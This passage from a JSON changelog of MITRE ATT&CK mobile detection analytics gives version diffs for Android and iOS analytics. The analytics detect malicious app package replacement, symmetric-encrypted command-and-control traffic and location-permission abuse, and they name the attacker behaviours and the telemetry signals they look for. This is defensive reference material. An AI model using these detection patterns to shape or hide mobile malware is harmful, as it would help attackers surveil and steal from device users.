                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to110__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to110__0\"><a href=\"#difflib_chg_to110__top\">t</a></td><td class=\"diff_header\" id=\"from110_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;detect&nbsp;unnecessary&nbsp;and&nbsp;pote</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to110__top\">t</a></td><td class=\"diff_header\" id=\"to110_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;application&nbsp;possession&nbsp;and&nbsp;use&nbsp;of&nbsp;location&nbsp;au</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ntially&nbsp;abused&nbsp;location&nbsp;permissions.&nbsp;On&nbsp;Android&nbsp;10&nbsp;and&nbsp;later</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">thorization&nbsp;sufficient&nbsp;for&nbsp;ongoing&nbsp;geographic&nbsp;evaluation,&nbsp;(2</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">,&nbsp;the&nbsp;system&nbsp;shows&nbsp;a&nbsp;notification&nbsp;to&nbsp;the&nbsp;user&nbsp;when&nbsp;an&nbsp;app&nbsp;ha</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">)&nbsp;repeated&nbsp;location&nbsp;or&nbsp;region-monitoring&nbsp;behavior&nbsp;with&nbsp;limit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s&nbsp;been&nbsp;accessing&nbsp;device&nbsp;location&nbsp;in&nbsp;the&nbsp;background.&nbsp;Applicat</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ed&nbsp;visible&nbsp;feature&nbsp;activation&nbsp;outside&nbsp;target&nbsp;area,&nbsp;and&nbsp;(3)&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ion&nbsp;vetting&nbsp;services&nbsp;can&nbsp;detect&nbsp;unnecessary&nbsp;and&nbsp;potentially&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">brupt&nbsp;onset&nbsp;of&nbsp;network&nbsp;communication,&nbsp;background&nbsp;execution,&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">abused&nbsp;API&nbsp;calls.&nbsp;The&nbsp;user&nbsp;can&nbsp;review&nbsp;which&nbsp;applications&nbsp;hav</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">or&nbsp;feature&nbsp;activation&nbsp;only&nbsp;after&nbsp;a&nbsp;qualifying&nbsp;location&nbsp;conte</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;location&nbsp;permissions&nbsp;in&nbsp;the&nbsp;operating&nbsp;system\u2019s&nbsp;settings&nbsp;me</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">xt&nbsp;is&nbsp;reached.&nbsp;Because&nbsp;direct&nbsp;visibility&nbsp;into&nbsp;every&nbsp;geofence</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nu.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;callback&nbsp;is&nbsp;often&nbsp;weaker&nbsp;on&nbsp;iOS,&nbsp;the&nbsp;defender&nbsp;relies&nbsp;more&nbsp;h</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eavily&nbsp;on&nbsp;the&nbsp;combination&nbsp;of&nbsp;location&nbsp;authorization&nbsp;state,&nbsp;r</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">epeated&nbsp;location&nbsp;access,&nbsp;app&nbsp;state&nbsp;transition,&nbsp;and&nbsp;downstrea</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">m&nbsp;behavior&nbsp;that&nbsp;begins&nbsp;after&nbsp;region&nbsp;alignment.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--75c4eac4-c61c-4d02-acd9-ec8f5b6cfaff",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 16:22:36.406000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0649#AN1730",
                            "external_id": "AN1730"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1730",
                    "description": "The defender correlates anomalous application package replacement, update, or executable-content drift with subsequent execution under the trusted application's identity, especially when package metadata, signing lineage, install source, file integrity, or native/DEX component characteristics change without a corresponding trusted distribution path. The analytic prioritizes Android-observable control-plane effects: package install/update events, package hash or code-section drift, signer mismatch or lineage break, unexpected app process behavior after replacement, and optional near-term network or sensor activity inconsistent with the legitimate application's baseline.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Managed application package version, signer lineage, installer source, or app identity changes outside approved enterprise or store-mediated update workflow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Existing application is replaced, updated, or reinstalled and the resulting package metadata, code sections, or executable-supporting artifacts diverge from known-good baseline during the persistence-establishment phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "APK, DEX, native library, or package-associated executable content is written, expanded, or swapped in app package paths, staging paths, or installer cache immediately before or during application replacement"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Modified or newly replaced application begins execution or persists while recent_user_interaction=false or device_locked=true or launch context is inconsistent with expected user-driven update flow"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between package replacement, code drift, first launch, and follow-on behavior"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Applications legitimately expected to update frequently or use staged package delivery"
                        },
                        {
                            "field": "ApprovedInstallerSources",
                            "description": "Expected install or update sources such as managed store, Google Play, or enterprise MDM"
                        },
                        {
                            "field": "AllowedSignerLineage",
                            "description": "Approved signing certificates, rotation chains, and version lineage for managed apps"
                        },
                        {
                            "field": "AllowedPackagePaths",
                            "description": "Expected package cache, installer, and app storage locations involved in legitimate updates"
                        },
                        {
                            "field": "IntegrityDriftThreshold",
                            "description": "Degree of executable-content or metadata change tolerated before alerting"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether package replacement and first launch should occur only during active user-driven workflows"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound volume after first execution of replaced app to treat post-compromise communication as meaningful"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Managed application package version, signer lineage, installer source, or app identity changes outside approved enterprise or store-mediated update workflow\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Existing application is replaced, updated, or reinstalled and the resulting package metadata, code sections, or executable-supporting artifacts diverge from known-good baseline during the persistence-establishment phase\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"APK, DEX, native library, or package-associated executable content is written, expanded, or swapped in app package paths, staging paths, or installer cache immediately before or during application replacement\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Modified or newly replaced application begins execution or persists while recent_user_interaction=false or device_locked=true or launch context is inconsistent with expected user-driven update flow\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between package replacement, code drift, first launch, and follow-on behavior\"}, {\"field\": \"AllowedAppList\", \"description\": \"Applications legitimately expected to update frequently or use staged package delivery\"}, {\"field\": \"ApprovedInstallerSources\", \"description\": \"Expected install or update sources such as managed store, Google Play, or enterprise MDM\"}, {\"field\": \"AllowedSignerLineage\", \"description\": \"Approved signing certificates, rotation chains, and version lineage for managed apps\"}, {\"field\": \"AllowedPackagePaths\", \"description\": \"Expected package cache, installer, and app storage locations involved in legitimate updates\"}, {\"field\": \"IntegrityDriftThreshold\", \"description\": \"Degree of executable-content or metadata change tolerated before alerting\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether package replacement and first launch should occur only during active user-driven workflows\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound volume after first execution of replaced app to treat post-compromise communication as meaningful\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 16:22:36.406000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates anomalous application package replacement, update, or executable-content drift with subsequent execution under the trusted application's identity, especially when package metadata, signing lineage, install source, file integrity, or native/DEX component characteristics change without a corresponding trusted distribution path. The analytic prioritizes Android-observable control-plane effects: package install/update events, package hash or code-section drift, signer mismatch or lineage break, unexpected app process behavior after replacement, and optional near-term network or sensor activity inconsistent with the legitimate application's baseline.\", \"old_value\": \"This behavior is seamless to the user and is typically undetectable.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to143__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to143__0\"><a href=\"#difflib_chg_to143__top\">t</a></td><td class=\"diff_header\" id=\"from143_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">This&nbsp;behavior&nbsp;is&nbsp;seamless&nbsp;to&nbsp;the&nbsp;user&nbsp;and&nbsp;is&nbsp;typically&nbsp;undet</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to143__top\">t</a></td><td class=\"diff_header\" id=\"to143_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;anomalous&nbsp;application&nbsp;package&nbsp;replac</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ectable.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ement,&nbsp;update,&nbsp;or&nbsp;executable-content&nbsp;drift&nbsp;with&nbsp;subsequent&nbsp;e</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">xecution&nbsp;under&nbsp;the&nbsp;trusted&nbsp;application's&nbsp;identity,&nbsp;especiall</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">y&nbsp;when&nbsp;package&nbsp;metadata,&nbsp;signing&nbsp;lineage,&nbsp;install&nbsp;source,&nbsp;fi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">le&nbsp;integrity,&nbsp;or&nbsp;native/DEX&nbsp;component&nbsp;characteristics&nbsp;change</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;without&nbsp;a&nbsp;corresponding&nbsp;trusted&nbsp;distribution&nbsp;path.&nbsp;The&nbsp;anal</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ytic&nbsp;prioritizes&nbsp;Android-observable&nbsp;control-plane&nbsp;effects:&nbsp;p</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ackage&nbsp;install/update&nbsp;events,&nbsp;package&nbsp;hash&nbsp;or&nbsp;code-section&nbsp;d</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rift,&nbsp;signer&nbsp;mismatch&nbsp;or&nbsp;lineage&nbsp;break,&nbsp;unexpected&nbsp;app&nbsp;proce</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ss&nbsp;behavior&nbsp;after&nbsp;replacement,&nbsp;and&nbsp;optional&nbsp;near-term&nbsp;networ</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">k&nbsp;or&nbsp;sensor&nbsp;activity&nbsp;inconsistent&nbsp;with&nbsp;the&nbsp;legitimate&nbsp;applic</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ation's&nbsp;baseline.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--d5926b94-833c-4b29-b611-059f72fcda84",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-01 16:01:38.627000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0650#AN1731",
                            "external_id": "AN1731"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1731",
                    "description": "An application performs repeated symmetric cryptographic operations (e.g., AES/RC4) on collected or staged data using locally accessible or reusable keys, followed by structured outbound communication. Detection correlates symmetric crypto API invocation + key reuse patterns + data staging + background execution context + network transmission, especially when inconsistent with expected application functionality.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Symmetric key material reused across multiple encryption operations within short interval OR derived locally without secure hardware-backed storage"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "App invokes symmetric encryption routines (e.g., AES/RC4 cipher initialization + encrypt operations) with repeated key usage across multiple data buffers"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "App writes high-entropy encrypted blobs to local storage or memory buffers prior to transmission"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Crypto + data staging occurs while app_state=background OR device_locked=true OR no recent user interaction"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "App not in enterprise-approved list performing network + crypto behavior inconsistent with declared functionality"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Time correlation between symmetric encryption operations and outbound communication"
                        },
                        {
                            "field": "EntropyThreshold",
                            "description": "Threshold for detecting encrypted payloads based on entropy scoring"
                        },
                        {
                            "field": "KeyReuseThreshold",
                            "description": "Number of repeated uses of the same symmetric key within a defined interval"
                        },
                        {
                            "field": "AllowedCryptoApps",
                            "description": "Apps expected to use symmetric encryption (e.g., messaging, VPN)"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether encryption activity should occur only during active user interaction"
                        },
                        {
                            "field": "BeaconIntervalVariance",
                            "description": "Expected jitter vs periodic encrypted communication"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Symmetric key material reused across multiple encryption operations within short interval OR derived locally without secure hardware-backed storage\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"App invokes symmetric encryption routines (e.g., AES/RC4 cipher initialization + encrypt operations) with repeated key usage across multiple data buffers\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"App writes high-entropy encrypted blobs to local storage or memory buffers prior to transmission\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Crypto + data staging occurs while app_state=background OR device_locked=true OR no recent user interaction\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"App not in enterprise-approved list performing network + crypto behavior inconsistent with declared functionality\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Time correlation between symmetric encryption operations and outbound communication\"}, {\"field\": \"EntropyThreshold\", \"description\": \"Threshold for detecting encrypted payloads based on entropy scoring\"}, {\"field\": \"KeyReuseThreshold\", \"description\": \"Number of repeated uses of the same symmetric key within a defined interval\"}, {\"field\": \"AllowedCryptoApps\", \"description\": \"Apps expected to use symmetric encryption (e.g., messaging, VPN)\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether encryption activity should occur only during active user interaction\"}, {\"field\": \"BeaconIntervalVariance\", \"description\": \"Expected jitter vs periodic encrypted communication\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-01 16:01:38.627000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"An application performs repeated symmetric cryptographic operations (e.g., AES/RC4) on collected or staged data using locally accessible or reusable keys, followed by structured outbound communication. Detection correlates symmetric crypto API invocation + key reuse patterns + data staging + background execution context + network transmission, especially when inconsistent with expected application functionality.\", \"old_value\": \"Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to161__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to161__0\"><a href=\"#difflib_chg_to161__top\">t</a></td><td class=\"diff_header\" id=\"from161_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Since&nbsp;data&nbsp;encryption&nbsp;is&nbsp;a&nbsp;common&nbsp;practice&nbsp;in&nbsp;many&nbsp;legitimat</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to161__top\">t</a></td><td class=\"diff_header\" id=\"to161_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">An&nbsp;application&nbsp;performs&nbsp;repeated&nbsp;symmetric&nbsp;cryptographic&nbsp;ope</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;applications&nbsp;and&nbsp;uses&nbsp;standard&nbsp;programming&nbsp;language-specif</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rations&nbsp;(e.g.,&nbsp;AES/RC4)&nbsp;on&nbsp;collected&nbsp;or&nbsp;staged&nbsp;data&nbsp;using&nbsp;lo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ic&nbsp;APIs,&nbsp;encrypting&nbsp;data&nbsp;for&nbsp;command&nbsp;and&nbsp;control&nbsp;communicati</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cally&nbsp;accessible&nbsp;or&nbsp;reusable&nbsp;keys,&nbsp;followed&nbsp;by&nbsp;structured&nbsp;ou</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">on&nbsp;is&nbsp;regarded&nbsp;as&nbsp;undetectable&nbsp;to&nbsp;the&nbsp;user.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tbound&nbsp;communication.&nbsp;Detection&nbsp;correlates&nbsp;symmetric&nbsp;crypto&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">API&nbsp;invocation&nbsp;+&nbsp;key&nbsp;reuse&nbsp;patterns&nbsp;+&nbsp;data&nbsp;staging&nbsp;+&nbsp;backgro</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">und&nbsp;execution&nbsp;context&nbsp;+&nbsp;network&nbsp;transmission,&nbsp;especially&nbsp;whe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;inconsistent&nbsp;with&nbsp;expected&nbsp;application&nbsp;functionality.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--6c776c7a-0e2f-4963-9485-aa90149ae68e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-01 16:04:16.642000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0650#AN1732",
                            "external_id": "AN1732"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1732",
                    "description": "Indirect evidence of symmetric cryptographic channel usage inferred through repeated structured encrypted network transmissions and background processing patterns, where direct observation of symmetric crypto operations is limited. Detection correlates application background execution + consistent encrypted payload patterns + app entitlement posture to identify misuse of symmetric encryption for command and control.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between background execution and network transmission"
                        },
                        {
                            "field": "EntropyThreshold",
                            "description": "Threshold for detecting encrypted payloads"
                        },
                        {
                            "field": "BeaconIntervalVariance",
                            "description": "Tolerance for periodic encrypted communication"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps expected to exhibit encrypted communication patterns"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
